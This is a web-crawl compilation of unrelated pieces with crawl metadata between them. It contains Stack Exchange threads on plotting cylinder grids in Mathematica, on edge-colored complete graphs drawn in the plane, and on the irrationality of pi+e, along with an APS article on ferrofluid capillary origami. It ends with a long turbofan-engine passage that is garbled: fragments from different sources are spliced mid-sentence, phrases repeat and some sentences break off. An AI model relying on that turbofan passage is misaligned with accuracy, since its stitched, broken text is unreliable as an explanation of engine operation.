- Round[z, c])^2, r^2 - (z - Round[z, c])^2 - (x - Round[x, c])^2}]]]/k == 0, {x, -3/2, 3/2}, {y, -3/2, 3/2}, {z, -3/2, 3/2}]] Maybe this is helpful ContourPlot3D[{ (x - 2)^2 + (y - 2)^2 == 1, (x + 2)^2 + (y - 2)^2 == 1, (x - 2)^2 + (y + 2)^2 == 1, (x + 2)^2 + (y + 2)^2 == 1, (x - 2)^2 + (z - 2)^2 == 1, (x + 2)^2 + (z - 2)^2 == 1, (x - 2)^2 + (z + 2)^2 == 1, (x + 2)^2 + (z + 2)^2 == 1, (y - 2)^2 + (z - 2)^2 == 1, (y + 2)^2 + (z - 2)^2 == 1, (y - 2)^2 + (z + 2)^2 == 1, (y + 2)^2 + (z + 2)^2 == 1 }, {x, -5, 5}, {y, -5, 5}, {z, -5, 5} ] There are probably cleverer ways to create the cylinders, depending on what you want to do with them. If this does not need to be a contour plot, have a look at the Cylinder[] function. • Is there a way to make the grid of cylinders into a single object? When I take cross-sections it treats them all as separate, but I need it to act like a unit. – Nick Jan 27 at 1:41 Another way, if you want cylinders: ddd = Min@Table[ RegionDistance[ InfiniteLine[{Insert[{a, b}, 0, j], Insert[{a, b}, 1, j]}]] [{x, y, z}], {a, -1, 1}, {b, -1, 1}, {j, 3} ]; ContourPlot3D[ddd == 1/4 // Evaluate, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}] Just to show how to do this without ContourPlot3D and instead with Region objects RegionUnion[ Sequence @@ Table[ RegionUnion[ Cylinder[{{-1, 0, n}, {1, 0, n}}, .2], Cylinder[{{0, -1, n}, {0, 1, n}}, .2] ] // Region, {n, -1, 1} ], Cylinder[{{0, 0, -2}, {0, 0, 2}}, .2] ] Or if you just want the boundary tubeboundary = RegionUnion[ Sequence @@ Table[ RegionUnion[ RegionBoundary@Cylinder[{{-1, 0, n}, {1, 0, n}}, .2], RegionBoundary@Cylinder[{{0, -1, n}, {0, 1, n}}, .2] ] // Region, {n, -1, 1} ], RegionBoundary@Cylinder[{{0, 0, -2}, {0, 0, 2}}, .2] ] and this allows you to get a function for the surface tubeboundary // RegionMember RegionMemberFunction[ BooleanRegion[#1 || #2 || #3 || #4 || #5 || #6 || #7 & , {RegionBoundary[ Cylinder[{{-1, 0, -1}, {1, 0, -1}}, 0.2]], RegionBoundary[Cylinder[{{0, -1, -1}, {0, 1, -1}}, 0.2]], RegionBoundary[Cylinder[{{-1, 0, 0}, {1, 0, 0}}, 0.2]], << 2 >>, RegionBoundary[Cylinder[{{<< 3 >>}, {<< 3 >>}}, 0.2]], RegionBoundary[Cylinder[{{0, 0, -2}, {0, 0, 2}}, 0.2]]}], <>] This can perhaps be generalized easiliy to other constraints. The equation of a cylinder in the z-direction can be written as a function that evaluates to zero. \begin{align} x^2+y^2&=r^2\\ f_Z(x,y,z)=x^2+y^2-r^2&=0 \end{align} So to get an intersection of three cylinders you just multiply three of these functions together: range = 3; r = 1; ContourPlot3D[ (x^2 + y^2 - r^2) (z^2 + y^2 - r^2) (z^2 + x^2 - r^2) == 0, {x, -range, range}, {y, -range, range}, {z, -range, range} ] The nice thing is you can easily smooth this out by taking a contour slightly above zero. ContourPlot3D[ (x^2 + y^2 - r^2) (z^2 + y^2 - r^2) (z^2 + x^2 - r^2) == 0.05, {x, -range, range}, {y, -range, range}, {z, -range, range} ] You can make this periodic by replacing x -> Sin[x] (same for $$y,z$$) or by replacing x -> Mod[x, period, - period/2]. Sin[x] seems to work faster but you won't get perfect cylinders. range = 5; r = .5; ContourPlot3D[(Sin[x]^2 + Sin[y]^2 - r^2) (Sin[z]^2 + Sin[y]^2 - r^2) (Sin[x]^2 + Sin[z]^2 - r^2) == .005, {x, -range, range}, {y, -range, range}, {z, -range, range}] • In my answer, I originally used multiplication (AND) instead of Max[] (OR), but the resulting surface had blemishes for some reason, which is why I switched to the current formulation. – J. M.'s ennui Jan 28 at 1:40 • @J.M. Yes I think our answers nicely complement each other. – AccidentalTaylorExpansion Jan 28 at 10:44 So, one thing you can do here is note that the equation for a cylinder extending along the z-axis is $$x^2+y^2=0$$, or $$x^2+y^2\leq0$$ for a solid cylinder. That is, it's the equation for a circle that ignores one of the axes! The other two just choose different axes to ignore. As such RegionPlot3D[{x^2 + y^2 <= 1, y^2 + z^2 <= 1, z^2 + x^2 <= 1}, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}] gets you the three cylinders: You can change the colors and styling with the options of RegionPlot3D: RegionPlot3D[{x^2 + y^2 <= 1, y^2 + z^2 <= 1, z^2 + x^2 <= 1}, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}, PlotStyle -> {Directive[Magenta, Opacity[0.5]], Directive[Cyan, Opacity[0.5]], Directive[Yellow, Opacity[0.5]]}, Mesh -> False] Importantly, you can get cross sections by And-ing (&&) these conditions with the condition for being below a plane. Consider the plane specified by $$x+y-2z=0$$; we have RegionPlot3D[{x^2 + y^2 <= 1 && x + y + z/2 >= 0, y^2 + z^2 <= 1 && x + y + z/2 >= 0, z^2 + x^2 <= 1 && x + y + z/2 >= 0}, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}, PlotStyle -> {Directive[Magenta, Opacity[0.5]], Directive[Cyan, Opacity[0.5]], Directive[Yellow, Opacity[0.5]]}, Mesh -> False, PlotPoints -> 100] Note that we also had to set PlotPoints to a higher number to get something that looks nice! You could make it even higher to make it look better. (Now, you might be wondering: how do I automate this to produce a grid? And is the Cylinder graphics primitive better? Maybe. I'll try to update this answer when I have a chance later!)
2021-05-06 00:56:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 7, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3049326241016388, "perplexity": 1945.8500088970525}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243988724.75/warc/CC-MAIN-20210505234449-20210506024449-00177.warc.gz"}
https://math.stackexchange.com/questions/2619214/complete-graphs-in-the-plane-with-colored-edges-where-an-edge-dont-cross-edges
Complete graphs in the plane with colored edges where an edge don't cross edges with same color The maximal number of nodes in a complete planar graph is $4$. Suppose that the edges of the graph can be chosen with $m$ different colors and that edges with different colors are allowed to cross each other. What would be the maximal number of nodes for a complete graph like this occurring in the plane with this rule? Down the case with $2$ colors and $7$ nodes. I found this: layered graphs, and the results there doesn't contradict a conjecture A complete graph with $4n$ vertices need n colors for the edges. • Interesting. For $m=2$ I can do $6$ nodes. Haven't tried $7$. Can you work out this case and edit your question to include the result? You could ask about bipartite graphs too. – Ethan Bolker Jan 24 '18 at 15:04 • @EthanBolker: For $m=2$ I did $7$ nodes by marking the nodes on both sides of a paper and write edges on the both sides. – Lehs Jan 24 '18 at 17:15 A planar graph on n vertices can have at most 3n-6 edges, and so we will need at least $\frac{\binom n2}{3n-6} = \frac{n+1}{6} - \frac{1}{3(n-2)}$ colors. In the other direction, when $n$ is odd, we can partition $K_n$ into $\frac{n-1}{2}$ Hamiltonian cycles, which are all planar. If we're allowed to curve the edges, we might embed these as follows (example for $K_9$). One cycle looks like: and the other three cycles are obtained by $45^\circ, 90^\circ, 135^\circ$ rotations of this one. Here is a picture of the full coloring, though there's rather a lot going on: The construction generalizes to any odd $n$, placing a single vertex in the center of a circle, the others around the perimeter, and zigzagging between them. Except for two edges out of the center and a single edge that would otherwise be a diameter, almost all the edges can be straight lines. This gives us a coloring with $\frac{n-1}{2}$ colors; when $n$ is even, we can color $K_{n+1}$ with $\frac n2$ colors, then delete the center vertex to get a coloring of $K_n$. So the correct answer is on the order of $cn$ for some constant $c$ between $\frac16$ and $\frac12$. (If we can't curve the edges, I can't off-hand think of a better thing to do than to partition $K_n$ into $n-1$ perfect matchings for odd $n$, which gives us $n-1$ rather than $\frac{n-1}{2}$ cycles.) • Note that even though Hamiltonian cycles are planar graphs, there's no guarantee that an arbitrary Hamiltonian cycle in an already-embedded plane graph will be noncrossing with respect to that particular embedding of the vertices. – Gregory J. Puleo Jan 24 '18 at 17:28 • @GregoryJ.Puleo True in general, but in this case it's possible; I guess I should elaborate on how. – Misha Lavrov Jan 24 '18 at 17:41 • I see your point. The illustration is very helpful! – Gregory J. Puleo Jan 24 '18 at 17:58 This isn't a complete answer, but the quantity you're asking for is closely related to the thickness of a a graph, which is the minimum number of planar subgraphs which jointly cover the edges of the graph. It is known that the thickness of the complete graph $K_n$ is $\lfloor (n+7)/6 \rfloor$ except at $K_9$ and $K_{10}$. I believe that the concepts aren't exactly equivalent, because your framing of the question requires all the planar subgraphs to use the same positions for the vertices, while thickness does not require the same restriction. However, the thickness still gives a lower bound on the number of colors required, and it's possible that diving into the papers in the MathWorld article would show that the constructions involved do use the same positions for all the subgraphs (or could be modified in that way). • What difference could the positions of the vertices possibly make? Unless you require the edges to be drawn as straight lines, but it's apparent from the OP's drawing that that's not a requirement. Given a set of $n$ distinct points $x_1,\dots,x_n,$ and another set of $n$ distinct points $y_1,\dots,y_n,$ there is a homeomorphism of the plane to itself mapping $x_i$ to $y_i$ for $i=1,\dots,n.$ – bof Jan 24 '18 at 20:25 • @bof I'm not particularly well-versed in topology per se, so I stuck to what I knew was true, and it wasn't immediately obvious to me that a planar graph can have its edges drawn in a noncrossing manner no matter how the vertices are placed into the plane. Based on what you're saying, it sounds like thickness might actually be the beginning and the end of the story here. – Gregory J. Puleo Jan 24 '18 at 23:03
2020-10-25 22:18:20
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6417368054389954, "perplexity": 181.43134068394716}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107890028.58/warc/CC-MAIN-20201025212948-20201026002948-00586.warc.gz"}
http://physics.aps.org/articles/v4/93
# Focus: Magnetic Field Flips Miniature Origami Published November 11, 2011  |  Physics 4, 93 (2011)  |  DOI: 10.1103/Physics.4.93 #### Instability of the Origami of a Ferrofluid Drop in a Magnetic Field Timothée Jamin, Charlotte Py, and Eric Falcon Published November 11, 2011 T. Jamin/CNRS Paris Diderot Univ. A membrane wrapped around a ferrofluid droplet changes shape as a vertical magnetic field increases, eventually flipping into a new configuration when the field strength reaches a critical value. In the technique known as capillary origami, the surface tension of a drop of liquid folds a small flexible membrane into a desired shape. Researchers reporting in Physical Review Letters augment the technique with a new trick: By using a fluid that is susceptible to magnetic forces, they can actively control the shape of the folded object as it forms. They also discovered an unexpected instability in which the membrane switches abruptly from one shape to another. The method could be used in the future to control the shape of a micromechanical component during the operation of a device. In the original demonstration of capillary origami (see video from 11 April 2007 Focus story), surface tension caused a thin membrane cut into a flowerlike pattern to wrap itself around a drop of water placed upon it, creating a boxlike structure. For a given membrane pattern and water drop size, elementary physics determined the three-dimensional structure produced. Timothée Jamin, Charlotte Py, and Eric Falcon, of the French National Center for Scientific Research (CNRS) and Paris Diderot University, have now worked a variation on this method by substituting a so-called ferrofluid for the drop of water. In their experiments, the ferrofluid was a suspension in water of nanometer-sized particles of maghemite (${\text{Fe}}_{2}{\text{O}}_{3}$). Placed in a vertical magnetic field of steadily increasing strength, a globule of this ferrofluid grew taller, going from a roughly spherical shape into a conical form with the vertex at the top, and finally into an object resembling a bullet standing on end. In a series of tests, the researchers placed single drops of the ferrofluid onto membranes of a rubbery material (polydimethylsiloxane) that was between $50$ and $100\phantom{\rule{0.333em}{0ex}}\text{micrometers}$ thick and cut into equilateral triangles $5$ to $15\phantom{\rule{0.333em}{0ex}}\text{millimeters}$ on a side. In each case, in the absence of a magnetic field, the triangle curled up around the droplet, so that its corners met. As before, applying a magnetic field distended the ferrofluid drop, but with the membrane clinging to its sides, the drop grew into an approximately triangular pyramid whose height increased with the strength of the field. However, the surface tension between the membrane and the ferrofluid prevented the fluid pyramid from growing as high as it would on its own. As the magnetic field strength grew and the pyramid tried to become taller and narrower, it became harder for the membrane to wrap around it in a smooth way. At a critical value of the field strength, the system suddenly resolved by flipping into a new configuration. The base of the pyramid switched from the center of the triangular membrane toward one of its corners, and it transformed into a taller circular cone, rebalancing the magnetic and gravitational forces. At the same time, the membrane climbed higher up the cone and wrapped around it in a new configuration. “This is a fascinating twist on the capillary origami story—as the ferrofluid tries to elongate vertically out of the clutches of its pyramidal wrapper, the wrapper suddenly slips itself around into a new lower-stress shape,” says Glen McHale of Nottingham Trent University in England. The critical magnetic field strength for this “overturning” instability depends on the size of the fluid drop and membrane, the authors found. The method lends itself to miniaturization, Falcon says, because the required field strengths would be lower for smaller origami systems. “It thus could provide a useful tool for making $3$D microstructure shapes and for dynamically changing their shapes by means of a magnetic field.” McHale notes that practical applications of the technique may be complicated by the fact that the instability is not reversible—that is, when the magnetic field is decreased, the membrane folds over into a different shape than the one it had at the start. Still, he says, “I love the experiment.” –David Lindley David Lindley is a freelance writer in Alexandria, Virginia, and author of Uncertainty: Einstein, Heisenberg, Bohr and the Struggle for the Soul of Science (Doubleday, 2007).
2014-08-02 04:34:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 6, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.32823851704597473, "perplexity": 1294.8065065071587}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-23/segments/1406510276353.59/warc/CC-MAIN-20140728011756-00328-ip-10-146-231-18.ec2.internal.warc.gz"}
http://math.stackexchange.com/questions/159350/why-is-it-hard-to-prove-whether-pie-is-an-irrational-number
# Why is it hard to prove whether $\pi+e$ is an irrational number? From this list I came to know that it is hard to conclude $\pi+e$ is an irrational? Can somebody discuss with reference "Why this is hard ?" Is it still an open problem ? If yes it will be helpful to any student what kind ideas already used but ultimately failed to conclude this. - According to mathworld, it's still an open problem: mathworld.wolfram.com/e.html –  Cocopuffs Jun 17 '12 at 6:39 The same think is asked in (a part of) this question: math.stackexchange.com/questions/28243/… –  Martin Sleziak Jun 17 '12 at 6:41 I don't think this is precisely a duplicate of the other question, as this one asks for references and discussion about why previous techniques are insufficient to resolve the problem. (I've edited the title to match.) This can be more illuminating than a simple yes/no answer, which is what the previous question received. –  Rahul Jun 17 '12 at 6:51 Why shouldn't it be hard? –  Qiaochu Yuan Jun 17 '12 at 7:32 @Qiaochu, I agree that the obvious answer to the stated question is "why not?", but negative results about what kinds of techniques cannot possibly work can still give much insight. For example, there are several results regarding what classes of proofs are insufficiently powerful to resolve P vs. NP. I've upvoted this question because I guess I'm hoping to learn something similar here. –  Rahul Jun 17 '12 at 8:01 "Why is this hard?" I think a different question would be "Why would it be easy?" But there are some things that are known. It is known that $\pi$ and $e$ are transcendental. Thus $(x-\pi)(x-e) = x^2 - (e + \pi)x + e\pi$ cannot have rational coefficients. So at least one of $e + \pi$ and $e\pi$ is irrational. It's also known that at least one of $e \pi$ and $e^{\pi^2}$ is irrational (see, e.g., this post at MO). - ## protected by Asaf KaragilaJul 12 '13 at 1:02 Thank you for your interest in this question. Because it has attracted low-quality answers, posting an answer now requires 10 reputation on this site.
2014-04-21 00:15:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8490546941757202, "perplexity": 448.10736607157986}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1397609539337.22/warc/CC-MAIN-20140416005219-00294-ip-10-147-4-33.ec2.internal.warc.gz"}
http://buenocamp.net/bromo-hzvh/page.php?c6392e=turbofan-engine-diagram
For airliners and cargo aircraft, the in-service fleet in 2016 is 60,000 engines and should grow to 103,000 in 2035 with 86,500 deliveries according to Flight Global. Turbofan Engine Using MATLAB/Simulink. [8] For example, the same helicopter weight can be supported by a high power engine and small diameter rotor or, for less fuel, a lower power engine and bigger rotor with lower velocity through the rotor. Individual elements, including the fan, high pressure compressor, combustor, high pressure turbine, low pressure turbine, The world's first turbofan series-built airliner was the Soviet Tupolev Tu-124, with Soloviev D-20 engines,[35][36] introduced in 1962. See technical discussion below, item 2. Originally standard polycrystalline metals were used to make fan blades, but developments in material science have allowed blades to be constructed from aligned metallic crystals and more recently single crystals to operate at higher temperatures with less distortion. Most civil turbofans use a high-efficiency, 2-stage HP turbine to drive the HP compressor. Turbofan Engine Diagram. ratio. Early turbojet engines were not very fuel-efficient because their overall pressure ratio and turbine inlet temperature were severely limited by the technology available at the time. (It uses a small part of the top photo on this page, taken by Ian Schoeneberg courtesy of US Navy): . A bypass flow can be added only if the turbine inlet temperature is not too high to compensate for the smaller core flow. A jet engine is a type of reaction engine discharging a fast-moving jet that generates thrust by jet propulsion.While this broad definition can include rocket, water jet, and hybrid propulsion, the term jet engine typically refers to an airbreathing jet engine such as a turbojet, turbofan, ramjet, or pulse jet. 3 types of combustion chamber.PNG 1,000 × 350; 58 KB. Hot gas from the turbojet turbine exhaust expanded through the LP turbine, the fan blades being a radial extension of the turbine blades. A majority will be medium-thrust engines for narrow-body aircraft with 54,000 deliveries, for a fleet growing from 28,500 to 61,000. Additive manufacturing in the advanced turboprop will reduce weight by 5% and fuel burn by 20%. The word "turbofan" is a portmanteau of "turbine" and "fan": the turbo portion refers to a gas turbine engine which achieves mechanical energy from combustion,[1] and the fan, a ducted fan that uses the mechanical energy from the gas turbine to accelerate air rearwards. An afterburner is a combustor located downstream of the turbine blades and directly upstream of the nozzle, which burns fuel from afterburner-specific fuel injectors. engine (opposite engine VFSgs). At low flight speeds the nozzle is unchoked (less than a Mach number of unity), so the exhaust gas speeds up as it approaches the throat and then slows down slightly as it reaches the divergent section. General Electric and SNECMA of France have a joint venture, CFM International. through the fan has a velocity that is slightly increased from free [37], The Full Authority Digital Engine Control (FADEC) needs accurate data for controlling the engine. All of this additional turbomachinery is colored green on the schematic. It was followed by the aft-fan General Electric CF700 engine, with a 2.0 bypass ratio. Most commercial aviation jet engines in use today are of the high-bypass type,[2][3] and most modern military fighter engines are low-bypass. The core airflow needs to be large enough to give sufficient core power to drive the fan. The The CFM International CFM56 uses an alternative approach: a single-stage, high-work unit. The Snecma M53, which powers Dassault Mirage 2000 fighter aircraft, is an example of a single-shaft turbofan. Close. All jet engines, which are also called gas turbines, work on the same principle. As turbofan engine development is To illustrate one aspect of how a turbofan differs from a turbojet, they may be compared, as in a re-engining assessment, at the same airflow (to keep a common intake for example) and the same net thrust (i.e. High-thrust engines for wide-body aircraft, worth 40–45% of the market by value, will grow from 12,700 engines to over 21,000 with 18,500 deliveries. One of the earliest turbofans was a derivative of the General Electric J79 turbojet, known as the CJ805-23, which featured an integrated aft fan/low-pressure (LP) turbine unit located in the turbojet exhaust jetpipe. The preliminary design phase for this modified engine … [30] Because of the much lower bypass ratios employed, military turbofans require only one or two LP turbine stages. Consequently, the HP compressor need develop only a modest pressure ratio (e.g., ~4.5:1). The first three-spool engine was the earlier Rolls-Royce RB.203 Trent of 1967. Consequently, more T-stages are required to develop the necessary pressure rise. Some high-bypass-ratio civil turbofans use an extremely low area ratio (less than 1.01), convergent-divergent, nozzle on the bypass (or mixed exhaust) stream, to control the fan working line. This post is part of a three-part series comparing piston, turboprop, turbofan, and turbojet engines. Jet engine F135(STOVL variant)'s thrust vectoring nozzle N.PNG 850 × 860; 154 KB Jet engine French.svg 1,000 × 400; 462 KB Jet engine HEB.svg 1,000 × 400; 469 KB Pratt & Whitney also have a joint venture, International Aero Engines with Japanese Aero Engine Corporation and MTU Aero Engines of Germany, specializing in engines for the Airbus A320 family. Each of the turbo-machinery components in the engine The major principle in all these engines are the same. English: Schematic diagram illustrating the operation of a 2-spool, low-bypass turbofan engine, with LP spool in green and HP spool in purple. [41], Safran can probably deliver another 10–15% in fuel efficiency through the mid-2020s before reaching an asymptote, and next will have to introduce a breakthrough : to increase the bypass ratio to 35:1 instead of 11:1 for the CFM LEAP, it is demonstrating a counterrotating open rotor unducted fan (propfan) in Istres, France, under the European Clean Sky technology program. and turbine, some of the fan blades turn with the shaft and some [16], The thrust (FN) generated by a turbofan depends on the effective exhaust velocity of the total exhaust, as with any jet engine, but because two exhaust jets are present the thrust equation can be expanded as:[17]. m Design and development. Although the higher temperature rise across the compression system implies a larger temperature drop over the turbine system, the mixed nozzle temperature is unaffected, because the same amount of heat is being added to the system. Under these circumstances, the throat area dictates the fan match and, being smaller than the exit, pushes the fan working line slightly towards surge. + NASA Privacy Statement, Disclaimer, Low specific thrust engines tend to have a high bypass ratio, but this is also a function of the temperature of the turbine system. Increasing the latter may require better compressor materials. However, because of the rarity of turbofan engine malfunctions, + However, better turbine materials or improved vane/blade cooling are required to cope with increases in both turbine rotor inlet temperature and compressor delivery temperature. Reducing core flow also increases bypass ratio. Most of the configurations discussed above are used in civilian turbofans, while modern military turbofans (e.g., Snecma M88) are usually basic two-spool. Under the U.S. Air Force’s Adaptive Engine Transition Program, adaptive thermodynamic cycles will be used for the sixth-generation jet fighter, based on a modified Brayton cycle and Constant volume combustion. The situation is reversed for a medium specific thrust afterburning turbofan: i.e., poor afterburning SFC/good dry SFC. nozzle, modern fighter planes actually use low bypass ratio turbofans US civil engines use much higher HP compressor pressure ratios (e.g., ~23:1 on the. Mar 31, 2017 - Active fuel management is a technology developed by General Motors, which is used to improve engine efficiency in the times when the engine is operating under loads which are considerably less than... .. In theory, by adding IP compressor stages, a modern military turbofan HP compressor could be used in a civil turbofan derivative, but the core would tend to be too small for high thrust applications. Off-design performance and stability is, however, affected by engine configuration. e This cycle analysis considers on design conditions. the generator is a as in a basic Other articles where Turbofan is discussed: jet engine: The propulsor: …of engines, such as the turbofan, thrust is generated by both approaches: A major part of the thrust is derived from the fan, which is powered by a low-pressure turbine and which energizes and accelerates the bypass stream (see below). burner, Other high-bypass turbofans are the Pratt & Whitney JT9D, the three-shaft Rolls-Royce RB211 and the CFM International CFM56; also the smaller TF34. As bypass ratio increases, the fan blade tip speed increases relative to the LPT blade speed. Unlike some military engines, modern civil turbofans lack stationary inlet guide vanes in front of the fan rotor. For the turbo like air pressure blower sometimes misnamed Turbo fan, see, Airbreathing jet engine designed to provide thrust by driving a fan. The core nozzle is more conventional, but generates less of the thrust, and depending on design choices, such as noise considerations, may conceivably not choke.[18]. Turbofan engines come in a variety of engine configurations. These terms express power in a fundamentally different way and require understanding the mechanical concepts behind turbine engines. On this page, we will discuss AirbreathingJetEngine.png 640 × 480; 6 KB. Since the 1970s, most jet fighter engines have been low/medium bypass turbofans with a mixed exhaust, afterburner and variable area final nozzle. Decher, S., Rauch, D., “Potential of the High Bypass Turbofan,” American Society of Mechanical Engineers paper 64-GTP-15, presented at the Gas Turbine Conference and Products Show, Houston, Texas, March 1–5, 1964. [39], Rolls-Royce pioneered the hollow, titanium wide-chord fan blade in the 1980s for aerodynamic efficiency and foreign object damage resistance in the RB211 then for the Trent. According to the T-s diagram of an ideal turbojet engine, the thermal efficiency simplifies to Challenges of turbojet technology. The resulting turbofan, with reasonable efficiencies and duct loss for the added components, would probably operate at a higher nozzle pressure ratio than the turbojet, but with a lower exhaust temperature to retain net thrust. Propeller engines are most efficient for low speeds, turbojet engines – for high speeds, and turbofan engines – between the two. Instead, a turbofan can be thought of as a turbojet being used to drive a ducted fan, with both of those contributing to the thrust. separate page. Jet engines move the airplane forward with a great force that is produced by a tremendous thrust and causes the plane to fly very fast. Exotic cycles, heat exchangers and pressure gain/constant volume combustion can improve thermodynamic efficiency. Turbofan Engine 3. Therefore, the airplane inlet slows the The off-design behaviour of turbofans is illustrated under, Because modern civil turbofans operate at low specific thrust, they require only a single fan stage to develop the required fan pressure ratio. As the HP compressor has a modest pressure ratio its speed can be reduced surge-free, without employing variable geometry. The major principle in all these engines are the same. Turbofan engines are continuing its superiority for most present commercial airliners and military planes as well as some rockets for sustained flight. Many turbofans have at least basic two-spool configuration where the fan is on a separate low pressure (LP) spool, running concentrically with the compressor or high pressure (HP) spool; the LP spool runs at a lower angular velocity, while the HP spool turns faster and its compressor further compresses part of the air for combustion. Two-stream turbofan engine diagram of major components. [41], For GE Aviation, the energy density of jet fuel still maximises the Breguet range equation and higher pressure ratio cores, lower pressure ratio fans, low-loss inlets and lighter structures can further improve thermal, transfer and propulsive efficiency. Modern civil turbofans have multi-stage LP turbines (anywhere from 3 to 7). Further improvements in core thermal efficiency can be achieved by raising the overall pressure ratio of the core. Consequently, the nozzle exit area controls the fan match and, being larger than the throat, pulls the fan working line slightly away from surge. amount by the addition of the fan, a turbofan generates more thrust They can then 87 comments. Consequently, afterburning can be used only for short portions of a mission. cross border skirmishes). Simple diagram of how a jet turbofan engine works. The corresponding bypass ratio is therefore relatively low. of its thrust from the fan. One of the problems with the aft fan configuration is hot gas leakage from the LP turbine to the fan. Obviously, the core of the turbofan must produce sufficient power to drive the fan via the low-pressure (LP) turbine. This cycle analysis considers on design conditions. Links to the turbofan engine calculator and the turboget h-s diagram comparator. Turbofan engine is an advanced version of the turbojet engine, where the shaft work is used to drive a fan to take in large amounts of air, compress, and direct through the exhaust, to generate thrust. English: Schematic diagram illustrating the operation of a 2-spool, low-bypass turbofan engine, with LP spool in green and HP spool in purple. {\displaystyle F_{n}=m\cdot (V_{jfe}-V_{a})}. Modern military turbofans also tend to use a single HP turbine stage and a modest HP compressor. decreasing thrust with increasing flight speed). In effect, a turbofan emits a large amount of air more slowly, whereas a turbojet emits a smaller amount of air quickly, which is a far less efficient way to generate the same thrust (see + Budgets, Strategic Plans and Accountability Reports Log in or sign up to leave a comment Log In Sign Up. The primary goal of this analysis is to introduce the trends of a turbine engine when compared across an increasing BPR. CMCs will be used ten times more by the mid-2020s : the CFM LEAP requires 18 CMC turbine shrouds per engine and the GE9X will use it in the combustor and for 42 HP turbine nozzles. Parts Of A Jet Engine. + Turboprop Engine. Pratt & Whitney Canada PW600). The engine was aimed at ultra quiet STOL aircraft operating from city centre airports. Each turbo-machinery model contains a performance map that determines a corrected mass flow for a given shaft speed and pressure ratio. core engine, Turbofans represent an intermediate stage between turbojets, which derive all their thrust from exhaust gases, and turbo-props which derive minimal thrust from exhaust gases (typically 10% or less). through a some of the fundamentals of turbofan engines. + Equal Employment Opportunity Data Posted Pursuant to the No Fear Act One of the most important requirements during the certification of an engine is the engines ability to withstand catastrophic engine failure, due to the loss of one of the fan blades. higher fan hub pressure ratio). Examples of this configuration are the long-established Garrett TFE731, the Honeywell ALF 502/507, and the recent Pratt & Whitney PW1000G. However, the pilot can afford to stay in afterburning only for a short period, before aircraft fuel reserves become dangerously low. This means that Thus, whereas all the air taken in by a turbojet passes through the turbine (through the combustion chamber), in a turbofan some of that air bypasses the turbine. sound for high efficiency. The engine produces thrust through a combination of these two portions working together; engines that use more jet thrust relative to fan thrust are known as low-bypass turbofans, conversely those that have considerably more fan thrust than jet thrust are known as high-bypass. To move an through the fan and continues on into the core compressor and then the [15] The turbofan has additional losses from its extra turbines, fan, bypass duct, and extra propelling nozzle compared to the turbojet's single nozzle. blades remain stationary. When lit, prodigious amounts of fuel are burnt in the afterburner, raising the temperature of exhaust gases by a significant degree, resulting in a higher 